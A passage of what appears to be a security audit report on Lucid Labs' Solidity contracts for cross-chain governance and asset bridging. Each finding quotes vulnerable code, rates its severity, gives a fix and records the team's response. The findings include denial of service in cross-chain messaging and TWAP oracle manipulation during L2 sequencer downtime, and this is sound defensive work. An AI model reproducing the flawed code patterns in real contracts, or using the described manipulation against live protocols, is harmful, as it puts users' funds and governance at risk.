uint256 proposalId,
address account,
uint8 support,
uint256 totalWeight,
bytes memory voteData, //E when called from LucidGovernor{Timelock} it is not implemented => _countVoteNominal is called
uint256 chainId
) internal virtual {
if (totalWeight == 0) revert GovernorCrossCountingFractionalUpgradeable_NoWeight();
if (_proposalVotersWeightCast[_getVoterKey(proposalId, account, chainId)] >= totalWeight) { revert("GovernorCountingFractional: all weight cast");}
// ... //
}
function receiveMessage(...) public override nonReentrant {
// ...
uint256 _currentLimit = mintingCurrentLimitOf(msg.sender);
if (_currentLimit < transfer.amount) revert IXERC20_NotHighEnoughLimits();
// ...
}
These unhandled exceptions can cause CCIP messages to fail, potentially triggering Chainlink's manual execution mode after the 8-hour Smart Execution window. This will block subsequent messages, leading to a Denial of Service in cross-chain communication until the failed message can be executed.
The unhandled exceptions in CCIP message processing result in a vulnerability that disrupts cross-chain operations. This issue leads to:
Failure in updating cross-chain voting data, compromising the integrity of the governance system.
Blockage of asset transfers between chains, affecting the core functionality of the protocol.
Potential permanent DoS of the CCIP pathway until the blocked message can pass
It is recommended to implement proper exception handling in the receiving contracts or to handle messages received/execution in 2 ways.
RISK ACCEPTED: As the probability of this risk happening is low and even if the impact is high, the Lucid Labs team will leave the code as is, and will use the other adapters in case of this happening.
// Medium
The BondUniV3Oracle
contract relies on Uniswap V3's time-weighted average price (TWAP) mechanism, which is vulnerable to price manipulation on L2 networks during sequencer downtime. The vulnerability lies in the _validateAndGetPrice
function:
function _validateAndGetPrice(
address token_,
IUniswapV3Pool pool_,
uint32 observationWindowSeconds_,
uint8 decimals_
) internal view returns (uint256) {
(int24 timeWeightedTick, ) = OracleLibrary.consult(address(pool_), observationWindowSeconds_);
// ... (price calculation logic)
}
The OracleLibrary.consult()
function assumes price continuity during periods of sequencer inactivity. When an L2 sequencer resumes operation after downtime, it incorrectly extrapolates the last known price across the inactive period. This leads to inaccurate TWAP calculations, as the oracle fails to account for real-world price movements during the downtime.
On Arbitrum, the vulnerability is exacerbated by the delayed inbox feature, which allows transaction forcing. An attacker can exploit this by submitting transactions that take advantage of the outdated price while the sequencer is offline, ensuring their inclusion when the network resumes.
To mitigate this vulnerability, it is recommended to implement the following measures:
Prioritize the use of Chainlink oracles on L2 networks, as they are designed to handle sequencer downtime scenarios.
If Uniswap V3 oracles must be used on L2s, implement additional safeguards:
Integrate Chainlink's Sequencer Uptime Feed to verify sequencer status.
Enforce a minimum uptime period (e.g., 1 hour) after sequencer recovery before accepting oracle data.
Ensure the sequencer has been operational for at least the duration of the TWAP observation window for each pool query.
SOLVED: Sequencer uptime is now checked in a new BondUniV3OracleL2
contract.
// Medium
The AssetController
contract does not refund excess fees sent by users when calling burnAndBridgeMulti
or resendTransferMulti
. The contract forwards only the specified fees to each adapter without verifying if msg.value == (computed values of fees)
, potentially leaving unused and permanently blocked ETH in the contract.
function _relayTransfer(Transfer memory transfer, uint256 destChainId, address[] memory adapters, uint256[] memory fees) internal {
if (adapters.length != fees.length) revert Controller_Invalid_Params();
for (uint256 i = 0; i < adapters.length; i++) {
//E @AUDIT fees relayed but no checks sum(fees)=msg.value
IBaseAdapter(adapters[i]).relayMessage{value: fees[i]}(destChainId, getControllerForChain(destChainId), msg.sender, abi.encode(transfer));
emit TransferRelayed(transfer.transferId, adapters[i]);
}
}
The function forwards only the specified fees[i]
to each adapter, but it does not check if the total fees match the msg.value
sent with the transaction. Any excess ETH remains in the contract.
It is recommended to implement a check to ensure the total fees match the sent ETH or implement a check to refund excess ETH.
function _relayTransfer(Transfer memory transfer, uint256 destChainId, address[] memory adapters, uint256[] memory fees) internal {
if (adapters.length != fees.length) revert Controller_Invalid_Params();
uint256 totalFees = 0;
for (uint256 i = 0; i < fees.length; i++) {
totalFees += fees[i];
}
require(msg.value == totalFees, "Incorrect ETH amount sent");
for (uint256 i = 0; i < adapters.length; i++) {
// ... existing code ...
}
}
SOLVED: The Lucid Labs team added a check at the end of the relay transfer function to check for the sum of the fees.
// Medium
The BondChainlinkOracle.sol
contract fails to implement a check for the sequencer status on Layer 2 networks (Arbitrum, Optimism, Linea). Specifically, in the _validateAndGetPrice
function:
function _validateAndGetPrice(AggregatorV2V3Interface feed_, uint48 updateThreshold_) internal view returns (uint256) {
(uint80 roundId, int256 priceInt, , uint256 updatedAt, uint80 answeredInRound) = feed_.latestRoundData();
if (priceInt <= 0 || updatedAt < block.timestamp - uint256(updateThreshold_) || answeredInRound != roundId)
revert BondOracle_BadFeed(address(feed_));
return uint256(priceInt);
}
This function lacks a crucial check to ensure the L2 sequencer is active before using the price data. Without this check, the contract will continue to use potentially stale price data when the sequencer is down, leading to inaccurate pricing in the protocol.
It is recommended to implement a sequencer uptime check in the BondChainlinkOracle
contract for L2 deployments by adding a function to verify the sequencer status and integrate it into the _validateAndGetPrice
function.
SOLVED: Sequencer uptime is now checked in a new BondChainlinkOracleL2
contract.
// Medium
The VotingControllerUpgradeable
contract inherits from EIP712Upgradeable
but fails to call its initializer function during its own initialization. Specifically, the __EIP712_init()
function is not invoked in the initialize function of VotingControllerUpgradeable. This results in uninitialized EIP712 state variables.
The current implementation of the initialize function in VotingControllerUpgradeable
:
function initialize(
address[] memory controllers,
uint256[] memory chains,
address _localRegistry,
address _owner
) public initializer {
__OwnableInit_init(_owner);
__Pausable_init();
// Missing: __EIP712_init() call
// ... rest of initialization logic ...
}
Impact: The lack of proper EIP712 initialization leads to the following issues:
The HASHEDNAME
and HASHEDVERSION
state variables in the EIP712Upgradeable
contract remain uninitialized. This variable is used in the castVoteBySig
& castVoteWithReasonAndParamsBySig
functions.
The contract fails to comply with the EIP712
standard, potentially breaking integrations or front-end applications that expect proper EIP712 implementation.
Inconsistency is introduced in the protocol, as other similar contracts correctly initialize their EIP712 functionality.
It is recommended to modify the initialize function of VotingControllerUpgradeable to include the EIP712 initialization:
function initialize(
address[] memory controllers,
uint256[] memory chains,
address _localRegistry,
address _owner
) public initializer {
__OwnableInit_init(_owner);
__Pausable_init();
__EIP712_init("VotingController", "1");// Add this line
// ... rest of initialization logic ...
}
SOLVED: __EIP712_init
is now initialized.
// Low
The gas refund calculation in LucidGovernor.sol
and LucidGovernorTimelock.sol
is incorrect due to improper handling of EIP-150's 63/64 rule. The startGas
measurement is taken before making an external call to the refund function, resulting in inaccurate gas calculations.
In LucidGovernor.sol
:
function castVote(uint256 proposalId, uint8 support) public override returns (uint256) {
uint256 startGas = gasleft(); // @audit - measured before external call
address voter = _msgSender();
uint res = super._castVote(proposalId, voter, support, "");
if (refundGas != address(0)) {
IRefundGasUpgradeable(refundGas).refundGas(payable(voter), startGas);// @audit - external call affected by EIP-150
}
return res;
}
In RefundGasUpgradeable.sol
:
function refundGas(address payable voter, uint256 startGas) public {
if (msg.sender != governor) revert RefundGas_NotGovernor();
unchecked {
uint256 gasUsed = startGas - gasleft();// @audit - incorrect calculation due to EIP-150
uint256 gasPrice = MathUpgradeable.min(tx.gasprice, basefee + maxRefundPriorityFee);
uint256 refundAmount = MathUpgradeable.min(gasPrice * gasUsed, balance);
(bool refundSent, ) = voter.call{value: refundAmount}("");
}
}
The issue stems from EIP-150's requirement that external calls only receive 63/64ths of the remaining gas. When refundGas()
calculates startGas - gasleft()
, the startGas
value is higher (overstated by 1/64) than what was actually available in the function due to the 63/64 rule, resulting in an inflated gas usage calculation (and user receives less than what user should get back).
Impact
Users receive systematically lower gas refunds than they should for every vote cast
The loss for each transaction is approximately 1/64th of the gas costs
The cumulative impact is significant, given this is a governance system with expected high participation
It is recommended to account for the 63/64 rule in the calculation :
function refundGas(address payable voter, uint256 startGas) public {
unchecked {
uint256 adjustedStartGas = (startGas * 63) / 64;
uint256 gasUsed = adjustedStartGas - gasleft();
// rest of the function .. //
}
}
SOLVED: The Lucid Labs team implemented the recommended feature.
// Low
The MessageControllerUpgradeable
contract contains a function receiveMessage
responsible for handling incoming messages from other chains. In its current implementation, the executableAt
timestamp, which determines when a message can be executed, is set immediately upon the receipt of the first message. This approach inadvertently ties the start of the timelock period to the arrival of the initial message, rather than to the moment when the message threshold required for execution is met.
Affected Code Snippet:
MessageControllerUpgradeable.sol
:
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
/// .. OTHER CODE ... ///
// if message id does not exist
if (receivedMessage.receivedSoFar == 0) {
// store message
/// .. OTHER CODE ... ///
receivedMessage.receivedSoFar = 1;
receivedMessage.executableAt = block.timestamp + timelockDelay;
receivedMessage.expiresAt = block.timestamp + MESSAGE_EXPIRY;
/// .. OTHER CODE ... ////
} else {
// if message id exists
receivedMessage.receivedSoFar += 1;
}
// Check if the message can be executed
if ((receivedMessage.receivedSoFar >= receivedMessage.threshold) && (receivedMessage.expiresAt > block.timestamp)) {
emit MessageExecutableAt(message.messageId, receivedMessage.executableAt);
}
}
In the above code:
The executableAt
timestamp is assigned immediately when the first message is received:
receivedMessage.executableAt = block.timestamp + timelockDelay;
This assignment occurs regardless of whether the number of received messages has met the defined threshold for execution.
Assigning the executableAt
timestamp upon the receipt of the first message leads to a scenario where the timelock period begins even if the message threshold required for execution has not yet been achieved. This results in the following issues:
Insufficient Veto Window: If the threshold is met after a portion of the timelock
delay has already elapsed, the vetoer is left with a reduced time frame to cancel the message execution. For example, with a timelockDelay
of 24 hours, if the threshold is met 16 hours after the first message, the vetoer
only has 8 hours to act.
Predictable Timing Vulnerability: Malicious actors could exploit the predictable reduction in veto time by strategically timing the sending of messages to minimize the veto period.
To ensure that the voter has the complete timelockDelay
period available upon meeting the message threshold, the assignment of the executableAt
timestamp should be deferred until the threshold condition is satisfied. This adjustment guarantees that the timelock period is uniformly applied from the point of threshold attainment, thereby preserving the integrity of the veto mechanism.
function receiveMessage(bytes calldata receivedMsg, uint256 originChain, address originSender) public override nonReentrant {
// ... //
emit MessageReceived(message.messageId, msg.sender);
// if message id does not exist
if (receivedMessage.receivedSoFar == 0) {
// store message
receivedMessage.targets = message.targets;
receivedMessage.calldatas = message.calldatas;
receivedMessage.threshold = message.threshold;
receivedMessage.receivedSoFar = 1;
receivedMessage.originChainId = originChain;
receivedMessage.expiresAt = block.timestamp + MESSAGE_EXPIRY;
receivedMessage.executed = false;
receivedMessage.cancelled = false;
} else {
// if message id exists
receivedMessage.receivedSoFar += 1;
}
// Check if the message can be executed
if (receivedMessage.receivedSoFar >= receivedMessage.threshold && receivedMessage.executableAt == 0 && receivedMessage.expiresAt > block.timestamp) {
// Set the executableAt timestamp now that threshold is met
receivedMessage.executableAt = block.timestamp + timelockDelay;
emit MessageExecutableAt(message.messageId, receivedMessage.executableAt);
}
}
SOLVED: Timelock Delay is now set when a threshold is met.
// Low
The VotingControllerUpgradeable
uses an unsafe message hashing mechanism that breaks EIP712
standard compliance. The issue is found in the getMessageHash
function:
// Current unsafe implementation
function getMessageHash(
address _destGovernor,
uint256 _chainId,
uint256 proposalId,
uint8 support,
bytes memory voteData
) public pure returns (bytes32) {
return keccak256(abi.encodePacked(BALLOT_TYPEHASH, _destGovernor, _chainId, proposalId, support, voteData));
}
The implementation uses abi.encodePacked
instead of the EIP712
structured data hashing pattern. The use of abi.encodePacked
creates non-standard message signatures that bypass type checking and EIP712 standard.
It is recommended to Implement EIP712 compliant message hashing:
bytes32 public constant VOTE_TYPEHASH = keccak256(
"Vote(address destGovernor,uint256 chainId,uint256 proposalId,uint8 support,bytes voteData)"
);
function getMessageHash(
address _destGovernor,
uint256 _chainId,
uint256 proposalId,
uint8 support,
bytes memory voteData
) public view returns (bytes32) {
bytes32 structHash = keccak256(
abi.encode(
VOTE_TYPEHASH,
_destGovernor,
_chainId,
proposalId,
support,
keccak256(voteData)
)
);
return _hashTypedDataV4(structHash);
}
SOLVED: Proper EIP712 message hashing format is now used.
// Low
The CREATE3Factory contract will not work on ZKSYNC Era while other factory patterns using CREATE2 remain functional. The documentation explicitly states that basic CREATE2 patterns work:
// This works on ZKSYNC
MyContract a = new MyContract();
MyContract a = new MyContract{salt: ...}();
// This also works
bytes memory bytecode = type(MyContract).creationCode;
assembly {
addr := create2(0, add(bytecode, 32), mload(bytecode), salt)
}
However, CREATE3Factory implements a different pattern that will fail on ZKSYNC:
// CREATE3Factory.sol - Will fail on ZKSYNC
function deploy(bytes32 salt, bytes memory creationCode) external payable returns (address deployed) {
salt = keccak256(abi.encodePacked(msg.sender, salt));
return CREATE3.deploy(salt, creationCode, msg.value);// @audit-issue Uses proxy bytecode pattern
}
The CREATE3 implementation relies on proxy deployment patterns and runtime bytecode manipulation:
bytes internal constant PROXY_BYTECODE = hex"67_36_3d_3d_37_36_3d_34_f0_3d_52_60_08_60_18_f3";
function deploy(bytes32 salt, bytes memory creationCode, uint256 value) internal returns (address) {
bytes memory proxyChildBytecode = PROXY_BYTECODE;
assembly {
// Deploy proxy bytecode which ZKSYNC cannot handle
proxy := create2(0, add(proxyChildBytecode, 32), mload(proxyChildBytecode), salt)
}
// Additional proxy logic that breaks on ZKSYNC...
}
CREATE3Factory deployments fail on ZKSYNC Era chain
It is recommended to remove CREATE3Factory for ZKSYNC deployments or add chain restrictions.
RISK ACCEPTED: The Lucid Labs team will work on that in a future release.
// Low
The refundGas()
function in RefundGasUpgradeable.sol does not properly handle failed ETH transfers when refunding gas to voters. While the function emits an event with the transfer status, it does not validate or revert on failed transfers.
// RefundGasUpgradeable.sol
function refundGas(address payable voter, uint256 startGas) public {
if (msg.sender != governor) revert RefundGas_NotGovernor();
if (!refundGasEnabled) {
return;
}
unchecked {
uint256 balance = address(this).balance;
if (balance == 0) {
return;
}
uint256 basefee = MathUpgradeable.min(block.basefee, maxRefundBaseFee);
uint256 gasPrice = MathUpgradeable.min(tx.gasprice, basefee + maxRefundPriorityFee);
uint256 gasUsed = MathUpgradeable.min(startGas - gasleft() + refundBaseGas, maxRefundGasUsed);
uint256 refundAmount = MathUpgradeable.min(gasPrice * gasUsed, balance);
(bool refundSent, ) = voter.call{value: refundAmount}("");
emit RefundableVote(voter, refundAmount, refundSent);
}
}
ETH refund transfers fail silently if the recipient is a contract that cannot receive ETH and Voters lose their gas refunds.
It is recommended to add a require statement to revert on failed transfers:
function refundGas(address payable voter, uint256 startGas) public {
// ... existing code ...
(bool refundSent, ) = voter.call{value: refundAmount}("");
require(refundSent, "RefundGas: ETH transfer failed");
emit RefundableVote(voter, refundAmount, refundSent);
}
SOLVED: Call success is now checked in refundGas
.
// Informational
The AxelarExecutable.sol
contract contains two token execution functions that are never used throughout the codebase:
function executeWithToken(
bytes32 commandId,
string calldata sourceChain,
string calldata sourceAddress,
bytes calldata payload,
string calldata tokenSymbol,
uint256 amount
) external virtual;
function _executeWithToken(
bytes32 commandId,
string calldata sourceChain,
string calldata sourceAddress,
bytes calldata payload,
string calldata tokenSymbol,
uint256 amount
) internal virtual {}
Both functions are declared but never implemented or called within the protocol. The empty implementation of _executeWithToken()
and the virtual declaration of executeWithToken()
serve no functional purpose in the current architecture.
It is recommended to remove both executeWithToken()
and _executeWithToken()
functions from the AxelarExecutable contract since they provide no value to the protocol. If token execution functionality is needed in the future, it can be added through an upgrade or new implementation.
SOLVED: The Lucid Labs team removed the useless functions.
// Informational
The codebase contains several instances of unlocked pragma compiler directives. These directives do not specify a fixed compiler version, which can lead to inconsistencies and potential security vulnerabilities due to differences in compiler behavior across versions.
Locking the pragma helps to ensure that contracts do not accidentally get deployed using another pragma. For example, an outdated pragma version might introduce bugs that affect the contract system negatively.
Additionally, using a newer compiler version that introduces default optimizations, including unchecked overflow for gas efficiency, presents an opportunity for further optimization.
It is recommended to lock the pragma version to the same version used during development and testing.
SOLVED: Pragma compiler is now fixed.
// Informational
The WormholeAdapter
contract imports the IWormholeReceiver
interface, but never utilizes it in any capacity:
import {IWormholeReceiver} from "./interfaces/IWormholeReceiver.sol";
contract WormholeAdapter is BaseAdapter {
// Contract implementation never uses or implements IWormholeReceiver
}
The contract does not implement the interface nor use any of its functions or types. The import statement remains unused throughout the entire contract implementation and serves no functional purpose.
It is recommended to remove the IWormholeReceiver
import from WormholeAdapter.sol since it provides no value to the contract.
SOLVED: Useless import have been removed.
// Informational
The _getTwoFeedPrice()
function in BondChainlinkOracle.sol reads storage variables multiple times within computation branches when they can be stored in memory for gas optimization:
function _getTwoFeedPrice(PriceFeedParams memory params_) internal view returns (uint256) {
// Get decimal value scale factor
uint8 exponent;
uint8 denomDecimals = params_.denominatorFeed.decimals();
uint8 numDecimals = params_.numeratorFeed.decimals();
if (params_.div) {
if (params_.decimals + denomDecimals < numDecimals) revert BondOracle_InvalidParams();
exponent = params_.decimals + params_.denominatorFeed.decimals() - params_.numeratorFeed.decimals();
} else {
if (numDecimals + denomDecimals < params_.decimals) revert BondOracle_InvalidParams();
exponent = params_.denominatorFeed.decimals() + params_.numeratorFeed.decimals() - params_.decimals;
}
The function makes redundant calls to decimals()
on both feed contracts within the if/else branches, when these values are already stored in denomDecimals
and numDecimals
.
It is recommended to store the decimals values in memory variables and reuse them throughout the computation:
function _getTwoFeedPrice(PriceFeedParams memory params_) internal view returns (uint256) {
// Get decimal value scale factor
uint8 exponent;
uint8 denomDecimals = params_.denominatorFeed.decimals();
uint8 numDecimals = params_.numeratorFeed.decimals();
uint8 paramsDecimals = params_.decimals;
if (params_.div) {
if (paramsDecimals + denomDecimals < numDecimals) revert BondOracle_InvalidParams();
exponent = paramsDecimals + denomDecimals - numDecimals;
} else {
if (numDecimals + denomDecimals < paramsDecimals) revert BondOracle_InvalidParams();
exponent = denomDecimals + numDecimals - paramsDecimals;
}
// Get prices from feeds
uint256 numeratorPrice = _validateAndGetPrice(params_.numeratorFeed, params_.numeratorUpdateThreshold);
uint256 denominatorPrice = _validateAndGetPrice(params_.denominatorFeed, params_.denominatorUpdateThreshold);
// Calculate and scale price
return params_.div ? numeratorPrice.mulDiv(10 ** exponent, denominatorPrice) : numeratorPrice.mulDiv(denominatorPrice, 10 ** exponent);
}
SOLVED: The Lucid Labs team implemented the recommended feature.
// Informational
The burnAndBridge()
and burnAndBridgeMulti()
functions in AssetController.sol lack input validation for the amount parameter. This allows transactions to be executed with zero amounts:
function burnAndBridge(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address bridgeAdapter
) public payable nonReentrant whenNotPaused {
uint256 _currentLimit = burningCurrentLimitOf(bridgeAdapter);
if (_currentLimit < amount) revert IXERC20_NotHighEnoughLimits();
_useBurnerLimits(bridgeAdapter, amount);
IXERC20(token).burn(_msgSender(), amount);// @audit - amount is not checked for > 0// ...
}
function burnAndBridgeMulti(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address[] memory adapters,
uint256[] memory fees
) public payable nonReentrant whenNotPaused {
// ...
IXERC20(token).burn(_msgSender(), amount);// @audit - amount is not checked for > 0// ...
}
The absence of zero-amount validation allows unnecessary transactions that consume gas without transferring value
It is recommended to add a zero-amount check at the start of both functions:
function burnAndBridge(...) public payable nonReentrant whenNotPaused {
if (amount == 0) revert InvalidAmount();
// rest of the function
}
function burnAndBridgeMulti(...) public payable nonReentrant whenNotPaused {
if (amount == 0) revert InvalidAmount();
// rest of the function
}
SOLVED: Zero-amount check has been added.
// Informational
In AssetController.sol, the burnAndBridgeMulti()
function deducts the fee from the original amount after transferring it, which creates an inconsistency between the expected and actual transferred amounts:
// AssetController.sol#burnAndBridgeMulti
if (fee > 0) {
// First transfers the fee
IERC20(token).transferFrom(_msgSender(), address(this), fee);
IERC20(token).approve(address(feeCollector), fee);
feeCollector.collect(token, fee);
amount = amount - fee;// @audit - Reduces the amount after fee collection
}
// Later burns the reduced amount
IXERC20(token).burn(_msgSender(), amount);
This implementation has several issues:
Users expecting to bridge an exact amount will receive less due to the fee deduction
Any dependent protocols or smart contracts expecting exact amounts will have their transactions fail
This differs from standard DeFi practice where fees are handled separately from the main amount
It is recommended to separate the fee handling from the main amount:
function burnAndBridgeMulti(
address recipient,
uint256 amount,
bool unwrap,
uint256 destChainId,
address[] memory adapters,
uint256[] memory fees
) public payable nonReentrant whenNotPaused {
uint256 fee = feeCollector.quote(amount);
if (fee > 0) {
// Transfer fee separately
IERC20(token).transferFrom(_msgSender(), address(this), fee);
IERC20(token).approve(address(feeCollector), fee);
feeCollector.collect(token, fee);
}
// Transfer the full amount separately
IXERC20(token).burn(_msgSender(), amount);
// Rest of the function...
}
SOLVED: Fees are now retrieved, but now decremented from amount.
// Informational
In AssetController.sol, the _receiveMessage
function performs multiple unnecessary storage reads and writes when handling a ReceivedTransfer
. Each storage operation costs 2100 gas for first time storage (SSTORE) and 100 gas for subsequent modifications.
Current implementation:
ReceivedTransfer storage receivedTransfer = receivedTransfers[transfer.transferId];
if (receivedTransfer.receivedSoFar == 0) {
receivedTransfer.recipient = transfer.recipient; // SSTORE - 2100 gas
receivedTransfer.amount = transfer.amount; // SSTORE - 2100 gas
receivedTransfer.unwrap = transfer.unwrap; // SSTORE - 2100 gas
receivedTransfer.receivedSoFar = 1; // SSTORE - 2100 gas
receivedTransfer.threshold = transfer.threshold; // SSTORE - 2100 gas
receivedTransfer.originChainId = originChain; // SSTORE - 2100 gas
receivedTransfer.executed = false; // SSTORE - 2100 gas
} else {
receivedTransfer.receivedSoFar++; // SSTORE - 2100 gas
}
Each field access triggers a storage operation, significantly increasing gas costs
Multiple redundant storage reads when accessing the same struct fields multiple times
Unnecessary interim storage writes for new transfers
It is recommended to use memory struct and perform a single storage write at the end:
ReceivedTransfer memory receivedTransfer = receivedTransfers[transfer.transferId];
if (receivedTransfer.receivedSoFar == 0) {
receivedTransfer = ReceivedTransfer({
recipient: transfer.recipient,
amount: transfer.amount,
unwrap: transfer.unwrap,
receivedSoFar: 1,
threshold: transfer.threshold,
originChainId: originChain,
executed: false,
cancelled: false
});
} else {
receivedTransfer.receivedSoFar++;
}
// Check threshold and emit event using memory values
if (receivedTransfer.receivedSoFar >= receivedTransfer.threshold) {
emit TransferExecutable(transfer.transferId);
}
// Single storage write at the end
receivedTransfers[transfer.transferId] = receivedTransfer;
SOLVED: The function is now more gas efficient.
// Informational
The BaseAssetBridge.sol contract uses a duration
variable as a divisor in multiple functions without validating that it's non-zero. The duration is set in the constructor and cannot be modified afterwards, but lacks zero-value validation:
constructor(
address _owner,
uint256 _duration,// @audit No validation that it is > 0
address[] memory _bridges,
uint256[] memory _mintingLimits,
uint256[] memory _burningLimits
) OwnableInit(_owner) {
duration = _duration;// @audit - Directly assigned without checks// ...
}
The duration variable is used as a divisor in several critical functions:
function _changeMinterLimit(address _bridge, uint256 _limit) internal {
// ...
bridges[_bridge].minterParams.ratePerSecond = _limit / duration;// @audit - Division by duration// ...
}
function _changeBurnerLimit(address _bridge, uint256 _limit) internal {
// ...
bridges[_bridge].burnerParams.ratePerSecond = _limit / duration;// @audit - Division by duration// ...
}
If duration is set to 0 during deployment:
All functions using division by duration will revert
The bridge becomes completely unusable
A new contract deployment is required to fix the issue
It is recommended to add a duration validation in the constructor :
constructor(
address _owner,
uint256 _duration,
address[] memory _bridges,
uint256[] memory _mintingLimits,
uint256[] memory _burningLimits
) OwnableInit(_owner) {
if (_duration == 0) revert InvalidDuration();
duration = _duration;
// ...
}
SOLVED: Duration and addresses are now validated in AssetController's constructor.
// Informational
The ConnextAdapter contract's relayMessage
function sets the _delegate
parameter to address(0)
when calling the Connext bridge's xcall
function:
transferId = BRIDGE.xcall{value: _deductFee(msg.value)}(
destDomainId,
trustedAdapters[destChainId],
address(0),
0,
0,
abi.encode(BridgedMessage(message, msg.sender, destination))
);
This configuration prevents any address from updating slippage tolerance or retrying failed transactions on the destination chain. The _delegate
parameter is designed to specify an address with these capabilities, enhancing the robustness of cross-chain transfers.
It is recommended to modify the relayMessage
function to set the _delegate
parameter to a known address on the dest chain:
transferId = BRIDGE.xcall{value: _deductFee(msg.value)}(
destDomainId,
trustedAdapters[destChainId],
address(this),
0,
0,
abi.encode(BridgedMessage(message, msg.sender, destination))
);
SOLVED: Destination adapter is now set as a delegate in ConnextAdapter, and an exposed forceUpdateSlippage
function has been added.
// Informational
The MessageControllerUpgradeable.sol contract implements role-based access control by inheriting from AccessControlUpgradeable but does not utilize the provided onlyRole
modifier. Instead, it performs manual role checks using if statements:
// Current implementation in multiple functions
if (!hasRole(DEFAULT_ADMIN_ROLE, msg.sender)) revert Controller_Unauthorised();
// OpenZeppelin's more efficient approach
modifier onlyRole(bytes32 role) {
_checkRole(role);
_;
}
The current implementation duplicates code across multiple functions and does not follow OpenZeppelin's standardized access control
It is recommended to replace all manual role checks with OpenZeppelin's onlyRole
modifier:
// Before
function setLocalAdapter(address[] memory adapters, bool[] memory enabled) public {
if (!hasRole(DEFAULT_ADMIN_ROLE, msg.sender)) revert Controller_Unauthorised();
// Function logic
}
// After
function setLocalAdapter(address[] memory adapters, bool[] memory enabled) public onlyRole(DEFAULT_ADMIN_ROLE) {
// Function logic
}
SOLVED: Roles are now checked with OZ modifiers in MessageController.
// Informational
It was identified that the OwnableInitUpgradeable
and OwnableInit
contracts can renounceOwnership()
. This function is used to renounce the Owner
permission. Renouncing ownership before transferring would result in the contract having no owner, eliminating the ability to call privileged functions:
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
It is recommended that the Owner cannot call renounceOwnership()
without first transferring Ownership to another address. In addition, if a multisignature wallet is used, the call to the renounceOwnership()
function should be confirmed for two or more users.
ACKNOWLEDGED: The Lucid Labs team acknowledged the risk but won't implement a modification.
Halborn used automated testing techniques to enhance the coverage of certain areas of the smart contracts in scope. Among the tools used was Slither
, a Solidity static analysis framework.
After Halborn verified the smart contracts in the repository and was able to compile them correctly into their abis and binary format, Slither was run against the contracts. This tool can statically verify mathematical relationships between Solidity variables to detect invalid or inconsistent usage of the contracts' APIs across the entire code-base.
All issues identified by Slither
were proved to be false positives or have been added to the issue list in this report.
Halborn strongly recommends conducting a follow-up assessment of the project either within six months or immediately following any material changes to the codebase, whichever comes first. This approach is crucial for maintaining the project’s integrity and addressing potential vulnerabilities introduced by code modifications.
// Download the full report
* Use Google Chrome for best results
** Check "Background Graphics" in the print settings if needed